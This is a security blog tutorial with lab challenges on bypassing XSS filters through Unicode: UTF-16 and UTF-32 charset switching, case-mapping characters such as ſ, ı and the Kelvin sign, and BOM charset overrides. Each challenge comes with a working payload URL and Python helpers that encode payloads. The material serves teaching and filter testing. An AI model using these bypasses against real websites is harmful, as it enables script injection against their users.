Xssing Web Part 2 With Unicodes


This is the second part of “Xssing Web”. In this post I will show how to abuse Unicode to bypass XSS filters.
BTW, if you want to check the previous part, click here.

Note : If you think there are any mistakes in this post, kindly mention them in the comments.

I have developed several XSS challenges to show how Unicode can be used to bypass filters. If you want to try those challenges first, click here, and come back if you couldn’t solve any of them.

Abusing Unicode :

So what is Unicode?

-> Unicode is a standard that assigns a number (a code point) to every character. It also defines the encodings that turn those code points into bytes: UTF-8, UTF-16, UTF-32, etc.

1) UTF-8 :

Character Size : 1 to 4 bytes

Example :
Character “A” => 0x41
Character “¡”  => 0xC2 0xA1
Character “ಓ” => 0xE0 0xB2 0x93
Character “𪨶” => 0xF0 0xAA 0xA8 0xB6
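If you want to check these byte sequences yourself, here is a small Python sketch (Python is just my choice for illustration, nothing in the lab depends on it) that UTF-8-encodes each character and prints the bytes in the same 0xNN notation:

```python
def utf8_bytes(ch: str) -> str:
    # Encode one character as UTF-8 and format every byte as 0xNN
    return " ".join(f"0x{b:02X}" for b in ch.encode("utf-8"))

for ch in ["A", "¡", "ಓ", "𪨶"]:
    # Print the code point (ASCII only) next to its UTF-8 bytes
    print(f"U+{ord(ch):04X} => {utf8_bytes(ch)}")
```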

2) UTF-16 :

Character Size : 2 bytes (4 bytes, as a surrogate pair, for characters outside the Basic Multilingual Plane)

In UTF-16 there are two ways (byte orders) to represent any character.

i) UTF-16be (be - Big Endian) [most significant byte first]

Example :
Character “A” => 0x00 0x41

ii) UTF-16le (le - Little Endian) [least significant byte first]

Example :
Character “A” => 0x41 0x00
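A quick Python sketch to see both byte orders, plus the 4-byte surrogate-pair case mentioned above. Python's plain "utf-16" codec would prepend a BOM, which is why the explicit utf-16-be / utf-16-le codec names are used here:

```python
def hex_bytes(data: bytes) -> str:
    # Format raw bytes as "0xNN 0xNN ..."
    return " ".join(f"0x{b:02X}" for b in data)

print(hex_bytes("A".encode("utf-16-be")))  # 0x00 0x41
print(hex_bytes("A".encode("utf-16-le")))  # 0x41 0x00

# A character outside the BMP (U+2AA36) needs a surrogate pair: 4 bytes
print(hex_bytes("\U0002AA36".encode("utf-16-be")))  # 0xD8 0x6A 0xDE 0x36
```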

3) UTF-32 :

Character Size : 4 bytes

UTF-32 also has two ways (byte orders) to represent any character.

i) UTF-32be (be - Big Endian) [most significant byte first]

Example :
Character “A” => 0x00 0x00 0x00 0x41

ii) UTF-32le (le - Little Endian) [least significant byte first]

Example :
Character “A” => 0x41 0x00 0x00 0x00
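The same check for UTF-32, again as a small Python sketch. Unlike UTF-16, every code point takes exactly 4 bytes here:

```python
def hex_bytes(data: bytes) -> str:
    # Format raw bytes as "0xNN 0xNN ..."
    return " ".join(f"0x{b:02X}" for b in data)

for codec in ("utf-32-be", "utf-32-le"):
    print(codec, hex_bytes("A".encode(codec)))
# utf-32-be 0x00 0x00 0x00 0x41
# utf-32-le 0x41 0x00 0x00 0x00

# Even a character outside the BMP is still exactly 4 bytes
print(hex_bytes("\U0002AA36".encode("utf-32-be")))  # 0x00 0x02 0xAA 0x36
```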

Alright. Enough Unicode theory.

Let’s see some XSS filters that you can bypass using Unicode.

Challenge 1 :
http://rakeshmane.com/lab/unicode/xss.php?x=payload&charset=utf-8

How would you bypass it?
Think.

Hint : You can control the charset of the HTML response.

No luck?
It’s simple: you just have to use UTF-16 encoding to bypass the filter.

Solution :

http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00&charset=utf-16be

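Here we changed the charset to “utf-16be”, so the browser decodes the page as UTF-16 big endian. In UTF-16BE every ASCII character takes 2 bytes, a null byte followed by the ASCII byte, so <svg/onload=alert()> becomes \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>. A filter that inspects the raw bytes therefore never sees a contiguous <svg/onload=..., while the browser decodes those bytes back into <svg/onload=alert()>.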
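To avoid typing all those null bytes by hand, the parameter can be generated. This is a minimal Python sketch, assuming the input is reflected as raw bytes; utf16be_param is just a helper name made up for illustration. It keeps /, =, ( and ) unencoded to match the style of the solution URL (which additionally ends with one extra %00 that this sketch leaves out):

```python
from urllib.parse import quote

def utf16be_param(payload: str) -> str:
    # Each ASCII character becomes a null byte followed by the character
    raw = payload.encode("utf-16-be")
    # Percent-encode the bytes, leaving "/=()" literal like the URL above
    return quote(raw, safe="/=()")

print(utf16be_param("<svg/onload=alert()>"))
# %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
```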

Alright, now let’s assume the string “UTF-16” is filtered.

Challenge 2 :
http://rakeshmane.com/lab/unicode/xss1.php?x=payload&charset=utf-8

Now how would you bypass it?
Hint : You can control the charset of the HTML response.

No luck?
It’s also very simple, you can simply use UTF-32 encoding to bypass the filter.

Solution : 

http://rakeshmane.com/lab/unicode/xss1.php?charset=UTF-32&x=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

Note : When you don’t specify BE (Big Endian) or LE (Little Endian), browsers by default treat UTF-32 as “Big Endian” and UTF-16 as “Little Endian”.

BTW, did you notice that I added two extra null bytes at the beginning of our payload?

%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

Let me explain why. Each character in UTF-32 is 4 bytes long, so the browser reads the page in 4-byte units. If there are, say, just 2 bytes before our payload, the browser would combine them with the first 2 bytes of our payload into one character, and everything after that would be misaligned. Adding 2 extra null bytes completes that 4-byte unit, so the browser doesn’t consume any bytes of our payload while reading the previous character.
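Here is the padding idea as a Python sketch. bytes_before is an assumption you have to work out for the target page (the sketch uses 2, matching the example above), b"ab" is just a stand-in for whatever the page outputs before our input, and utf32be_param is a made-up helper name. With 2 bytes before the input it reproduces the x value of the solution exactly:

```python
from urllib.parse import quote, unquote_to_bytes

def utf32be_param(payload: str, bytes_before: int) -> str:
    # bytes_before: how many bytes the page emits before the reflected input.
    # Pad with nulls so the payload's first character starts on a 4-byte boundary.
    padding = b"\x00" * (-bytes_before % 4)
    return quote(padding + payload.encode("utf-32-be"), safe="/=()")

payload = "<svg/onload=alert()>"
param = utf32be_param(payload, bytes_before=2)
print(param)

# Simulate the browser decoding the page as UTF-32BE (invalid units -> U+FFFD)
page_prefix = b"ab"  # hypothetical 2 bytes of page content before our input
aligned_text = (page_prefix + unquote_to_bytes(param)).decode("utf-32-be", errors="replace")
misaligned_text = (page_prefix + payload.encode("utf-32-be")).decode("utf-32-be", errors="replace")
print(aligned_text.endswith(payload))  # True
print("<svg" in misaligned_text)       # False
```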

Abusing Unicode Case Mappings :


Now let’s move on to Unicode case mappings.

Let’s see if there are any Unicode characters which turn into English alphabet letters when mapped to upper or lower case.

I wrote a small piece of JS code to find these characters. [You can get the code here]
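The author’s JS code is linked above and not reproduced here. As an independent sketch of the same search, this Python snippet walks every code point and keeps the ones whose upper- or lower-case form consists only of ASCII letters. Python applies Unicode’s full case mappings, so the list may differ slightly from the image; for example, ligatures such as ﬁ upper-case to two letters (FI):

```python
import sys

def ascii_case_mappings():
    # Yield (character, direction, result) for every non-ASCII character whose
    # upper- or lower-case mapping is made only of ASCII letters
    for cp in range(0x80, sys.maxunicode + 1):
        ch = chr(cp)
        for direction, mapped in (("upper", ch.upper()), ("lower", ch.lower())):
            if mapped.isascii() and mapped.isalpha():
                yield ch, direction, mapped

for ch, direction, mapped in ascii_case_mappings():
    # Print only ASCII so the output works on any console
    print(f"U+{ord(ch):04X} -> {direction}: {mapped}")
```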

We can use these Unicode characters to bypass some XSS filters.

Challenge 3 :

http://rakeshmane.com/lab/unicode/xss2.php?x=payload

Could you solve it?
Hint : Check the image above

Let’s solve it. As you can see in the image above, the Unicode character ſ [\u017f] turns into the capital letter “S” when mapped to upper case.

Our payload : <ſcript/src=./1></script>

Solution :  http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>
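The post doesn’t show the challenge’s server-side code, so here is a purely hypothetical Python model of a filter this payload would beat: it blocks the literal <script, then upper-cases the input before reflecting it. hypothetical_filter is an illustrative name, not the lab’s real code:

```python
def hypothetical_filter(user_input: str) -> str:
    # HYPOTHETICAL model: the lab's real server code isn't shown in the post.
    # Step 1: block the literal "<script" (case-insensitively via lower()).
    # "ſ" has no different lower-case form, so "<ſcript" is not caught.
    if "<script" in user_input.lower():
        return "blocked"
    # Step 2: upper-case *after* the check; "ſ".upper() == "S"
    return user_input.upper()

print(hypothetical_filter("<script/src=./1></script>"))  # blocked
print(hypothetical_filter("<ſcript/src=./1></script>"))  # <SCRIPT/SRC=./1></SCRIPT>
```

Since ı is also left alone by lower() but becomes I under upper(), the same model lets <scrıpt/src=./1></script> through too.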

Now let’s make it a little harder.

Challenge 4 :
http://rakeshmane.com/lab/unicode/xss3.php?x=payload

Could you XSS now?
No? Ah. It’s also very simple.

Let’s check the image above again. There’s a Unicode character ı [\u0131] which turns into the capital letter “I” when mapped to upper case.

Our payload : <scrıpt/src=./1></script>

Solution : http://rakeshmane.com/lab/unicode/xss3.php?x=<scr%C4%B1pt/src=./1></script>

Now let’s try another challenge.

Challenge 5 :
http://rakeshmane.com/lab/unicode/xss4.php?x=payload

Try to solve it.
No luck? Go back to the image above. The Unicode character K [\u212a] turns into the letter “k” when mapped to lower case.

Our payload : x onclicK=aler$t()

Solution : http://rakeshmane.com/lab/unicode/xss4.php?x=x onclic%e2%84%aa=aler$t()

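Note : Since I couldn’t disable the WAF, I had to put ‘$’ in “aler$t()” to bypass it. aler$t is just an undefined name, so this exact payload throws a ReferenceError; with a plain alert() the handler would actually pop the alert box.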
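Again a purely hypothetical Python model, since the lab’s code isn’t shown: the check folds only ASCII A-Z before looking for onclick, while the output is lower-cased with full Unicode rules. The Kelvin sign slips through the first step and becomes k in the second. hypothetical_filter is an illustrative name, and the model uses plain alert() because there is no WAF here:

```python
import string

# Lower-cases A-Z only, leaving every non-ASCII character untouched
ASCII_LOWER = str.maketrans(string.ascii_uppercase, string.ascii_lowercase)

def hypothetical_filter(user_input: str) -> str:
    # HYPOTHETICAL model: the check only folds ASCII letters...
    if "onclick" in user_input.translate(ASCII_LOWER):
        return "blocked"
    # ...but the output is lower-cased with full Unicode rules afterwards
    return user_input.lower()

print(hypothetical_filter("x onclicK=alert()"))       # blocked (ASCII K)
print(hypothetical_filter("x onclic\u212a=alert()"))  # x onclick=alert()
```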


Tool to convert unicode code points to UTF-8 bytes :

http://www.ltg.ed.ac.uk/~richard/utf-8.cgi?input=0131&mode=hex
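If you’d rather not depend on an online tool, Python’s standard library does the same conversion. A small sketch (utf8_percent is just a helper name for illustration) that reproduces the percent-encoded bytes used in the solutions above:

```python
from urllib.parse import quote

def utf8_percent(cp: int) -> str:
    # Encode a code point as UTF-8 and percent-encode each byte for a URL
    return quote(chr(cp))

for cp in (0x017F, 0x0131, 0x212A):
    # e.g. "U+017F -> c5 bf -> %C5%BF"
    print(f"U+{cp:04X} -> {chr(cp).encode('utf-8').hex(' ')} -> {utf8_percent(cp)}")
```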

Abusing BOM – Byte Order Mark :

What is a BOM?


For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

– Wikipedia


Note : The page must begin with the BOM character.

– BOM Character :


For UTF-16 Encoding:


Big Endian : 0xFE 0xFF 

Little Endian : 0xFF 0xFE


For UTF-32 Encoding:

Big Endian : 0x00 0x00 0xFE 0xFF 

Little Endian : 0xFF 0xFE 0x00 0x00
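Python’s codecs module ships these BOMs as constants. Below is a small, generic BOM-sniffing sketch built on them (sniff_bom is a made-up name); it illustrates the idea and is not any browser’s exact algorithm. The UTF-32LE BOM (FF FE 00 00) starts with the UTF-16LE BOM (FF FE), so the longer marks are checked first, which also means a UTF-16LE page whose first character is U+0000 would be misread as UTF-32LE:

```python
import codecs

# Longer UTF-32 BOMs first, because FF FE 00 00 also starts with FF FE
BOMS = [
    (codecs.BOM_UTF32_BE, "utf-32-be"),  # 00 00 FE FF
    (codecs.BOM_UTF32_LE, "utf-32-le"),  # FF FE 00 00
    (codecs.BOM_UTF16_BE, "utf-16-be"),  # FE FF
    (codecs.BOM_UTF16_LE, "utf-16-le"),  # FF FE
]

def sniff_bom(data: bytes):
    # Return (encoding, decoded text without the BOM), or (None, None)
    for bom, encoding in BOMS:
        if data.startswith(bom):
            return encoding, data[len(bom):].decode(encoding)
    return None, None

print(sniff_bom(b"\xfe\xff\x00<\x00s"))  # ('utf-16-be', '<s')
```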

Alright. Here’s a small challenge. This challenge was actually posted by @rawsec

Challenge 6 :

http://rakeshmane.com/lab/unicode/xss5.php?q=payload

This is going to be a hard one.
Couldn’t solve it?

Hint : BOM

Still no luck?
Here’s one interesting thing about the BOM character: it overrides the charset of the page. The only requirement is that the page must begin with this character.

So to switch the page encoding to UTF-16BE you can use the BOM 0xFE 0xFF, and for UTF-32BE you can use 0x00 0x00 0xFE 0xFF.

UTF-16BE Solution

http://rakeshmane.com/lab/unicode/xss5.php?q=%fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E

UTF-32BE Solution

http://rakeshmane.com/lab/unicode/xss5.php?q=%00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
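Both solution payloads can be generated the same way as before, just with the BOM prepended. A minimal Python sketch (bom_param is a made-up helper name); Python writes uppercase hex (%FE%FF), which is equivalent to the lowercase %fe%ff in the URLs above:

```python
import codecs
from urllib.parse import quote

def bom_param(payload: str, encoding: str) -> str:
    # Prepend the matching BOM so it becomes the first bytes of the response
    boms = {"utf-16-be": codecs.BOM_UTF16_BE, "utf-32-be": codecs.BOM_UTF32_BE}
    raw = boms[encoding] + payload.encode(encoding)
    # Keep "/=()" literal to match the style of the solution URLs
    return quote(raw, safe="/=()")

print(bom_param("<svg/onload=alert()>", "utf-16-be"))
print(bom_param("<svg/onload=alert()>", "utf-32-be"))
```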

That’s enough for today 🙂

References :

https://www.w3.org/International/questions/qa-byte-order-mark
https://en.wikipedia.org/wiki/Byte_order_mark
http://www.fileformat.info/info/unicode/utf8.htm
http://www.fileformat.info/info/charset/UTF-16/list.htm
https://github.com/numirias/ctf/blob/master/writeup-google-ctf-2017-geokitties-v2.md
https://stackoverflow.com/questions/4655250/difference-between-utf-8-and-utf-16
https://stackoverflow.com/questions/496321/utf-8-utf-16-and-utf-32

 

Source: Rakesh Mane’s Blog